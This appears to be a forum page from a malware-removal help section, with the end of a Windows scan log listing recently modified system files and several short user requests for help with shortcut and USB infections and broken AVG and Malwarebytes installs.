2015-05-25 18:18:56 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-05-25 18:18:54 879104 ----a-w- C:\Windows\System32\advapi32.dll
2015-05-25 18:18:45 47104 ----a-w- C:\Windows\System32\typeperf.exe
2015-05-25 18:18:45 404992 ----a-w- C:\Windows\System32\tracerpt.exe
2015-05-25 18:18:39 112640 ----a-w- C:\Windows\System32\smss.exe
2015-05-25 18:18:32 296960 ----a-w- C:\Windows\System32\rstrui.exe
2015-05-25 18:18:30 43008 ----a-w- C:\Windows\System32\relog.exe
2015-05-25 18:18:19 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-05-25 18:18:19 104448 ----a-w- C:\Windows\System32\logman.exe
2015-05-25 18:18:11 19456 ----a-w- C:\Windows\System32\diskperf.exe
2015-05-25 18:18:08 338432 ----a-w- C:\Windows\System32\conhost.exe
2015-05-25 18:18:04 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-05-25 18:14:26 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-05-25 18:14:04 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-05-25 18:07:34 3989440 ----a-w- C:\Windows\SysWow64\ntkrnlpa.exe
2015-05-25 18:07:34 3934144 ----a-w- C:\Windows\SysWow64\ntoskrnl.exe
2015-05-25 18:04:08 1310744 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-05-25 18:00:44 40448 ----a-w- C:\Windows\SysWow64\typeperf.exe
2015-05-25 18:00:40 364544 ----a-w- C:\Windows\SysWow64\tracerpt.exe
2015-05-25 18:00:28 25600 ----a-w- C:\Windows\SysWow64\setup16.exe
2015-05-25 18:00:25 37888 ----a-w- C:\Windows\SysWow64\relog.exe
2015-05-25 18:00:17 82944 ----a-w- C:\Windows\SysWow64\logman.exe
2015-05-25 18:00:09 17408 ----a-w- C:\Windows\SysWow64\diskperf.exe
2015-05-25 18:00:04 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-05-25 17:59:52 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-05-25 17:59:52 5120 ----a-w- C:\Windows\SysWow64\wow32.dll
2015-05-25 17:59:51 274944 ----a-w- C:\Windows\SysWow64\KernelBase.dll
2015-05-25 17:57:31 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-05-25 17:57:15 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-05-25 17:08:39 3206144 ----a-w- C:\Windows\System32\win32k.sys
2015-05-25 17:00:56 36864 ----a-w- C:\Windows\System32\UtcResources.dll
2015-05-25 16:50:38 7680 ----a-w- C:\Windows\SysWow64\instnm.exe
2015-05-25 16:50:36 2048 ----a-w- C:\Windows\SysWow64\user.exe
2015-05-25 16:48:25 6144 ---ha-w- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
2015-05-25 16:48:25 4608 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-25 16:48:25 3584 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-25 16:48:25 3072 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
2015-05-23 03:28:17 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-05-23 03:15:54 503808 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-05-23 03:15:40 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-05-23 03:15:02 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-05-23 03:14:51 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-05-23 03:13:48 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-05-23 03:05:21 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-05-23 03:04:50 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-05-23 02:52:43 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-05-23 02:47:31 4305920 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-05-23 02:37:45 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-05-23 02:37:25 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-05-23 02:20:35 1950720 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-05-22 19:16:55 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-05-22 19:16:44 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-05-22 19:01:42 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-05-22 19:00:54 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-05-22 19:00:47 417792 ----a-w- C:\Windows\System32\html.iec
2015-05-22 19:00:25 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-05-22 18:59:27 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-05-22 18:52:21 6026240 ----a-w- C:\Windows\System32\jscript9.dll
2015-05-22 18:47:49 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-05-22 18:47:34 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-05-22 18:47:03 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-05-22 18:40:17 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-05-22 18:29:31 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-05-22 18:18:41 700416 ----a-w- C:\Windows\System32\generaltel.dll
2015-05-22 18:18:29 757248 ----a-w- C:\Windows\System32\invagent.dll
2015-05-22 18:18:24 423424 ----a-w- C:\Windows\System32\devinv.dll
2015-05-22 18:18:22 1021440 ----a-w- C:\Windows\System32\appraiser.dll
2015-05-22 18:18:21 45568 ----a-w- C:\Windows\System32\acmigration.dll
2015-05-22 18:18:21 227328 ----a-w- C:\Windows\System32\aepdu.dll
2015-05-22 18:13:03 1119232 ----a-w- C:\Windows\System32\aeinv.dll
2015-05-22 18:05:28 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-05-22 18:05:06 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-05-22 17:50:20 2426880 ----a-w- C:\Windows\System32\wininet.dll
2015-05-21 13:19:52 193536 ----a-w- C:\Windows\System32\aepic.dll
2015-05-16 06:23:39 0 ----a-w- C:\Windows\SysWow64\shoD5D8.tmp
2015-05-14 07:03:15 7680 ----a-w- C:\Windows\wnavga.exe
2015-05-14 07:03:15 7680 ----a-w- C:\Windows\cfsvc.exe
2015-05-13 21:11:36 922704 ----a-w- C:\Windows\System32\drivers\VBoxDrv.sys
2015-05-13 21:10:24 141440 ----a-w- C:\Windows\System32\drivers\VBoxNetAdp.sys
2015-05-13 21:10:24 128592 ----a-w- C:\Windows\System32\drivers\VBoxUSBMon.sys
2015-05-01 13:17:03 124112 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-05-01 13:16:41 102608 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\msdxm.ocx
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\dxmasf.dll
2015-04-29 18:21:46 9728 ----a-w- C:\Windows\System32\spwmp.dll
2015-04-29 18:19:43 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\msdxm.ocx
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2015-04-29 18:07:07 8192 ----a-w- C:\Windows\SysWow64\spwmp.dll
2015-04-29 18:05:19 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
2015-04-25 09:18:36 53248 ----a-w- C:\Windows\zlib.dll
2015-04-25 09:18:36 295424 ----a-w- C:\Windows\System32\ysxja.exe
2015-04-25 09:18:36 295424 ----a-w- C:\Windows\cygavb.exe
2015-04-24 18:17:26 633856 ----a-w- C:\Windows\System32\comctl32.dll
.
============= FINISH: 22:04:20.64 ===============

Attach:
Attachment 243402

I do not have a Windows install disc or a boot CD.

Attached Files
File Type: txt attach.txt (17.1 KB)

Malwarebytes error

unable to access AVG

The problem started after I was taking some files from a teacher via my pendrive.
The contents were made into shortcuts by a virus.
I knew it was a virus but I still double-clicked it and it popped up some error.
After that I right-clicked on the SHORTCUT and clicked SCAN WITH AVG,
and I could no longer see AVG running anywhere.
I tried to run AVG from its installed directory with administrator rights but it says "windows cannot access the specified path, device or file."
I can neither uninstall AVG nor repair it. Help.

Malwarebytes error 0xc000001d

Shortcut Virus and Write protection virus

Help, I need to format my USB but I think it is infected with the write protection virus. Here is the link for my scan: Report ⋆ UsbFix

Icons Double Boot on Startup

I was instructed to come here from another thread (Double Boot).

Originally Posted by Corday
I was going to say, run MSE, but I think that you should read this article.
NEW INSTRUCTIONS - Read This Before Posting For Malware Removal Help
Follow the instructions very carefully; then post all the requested logs and information, as instructed, in the Virus/Trojan/Spyware Help section of the forum.
(Simply, click on the colored links to be re-directed.)

Please ensure that you create a new thread in the Virus/Trojan/Spyware Help Forum; not back here in this one.

When carrying out The Malware Removal Steps, if you cannot complete any of them for whatever reason, just continue on with the next one until they are all completed.
However, it is extremely important to make mention of the fact that you could not complete any of the steps in your post to the Virus/Trojan/Spyware Help Forum, where an Analyst will assist you with other workarounds.

Once done, please be patient, as the Security Team Analysts are usually very busy; one of them will answer your request as soon as they can.

I am ready to start the process and am standing by.

Thanks in advance.

RA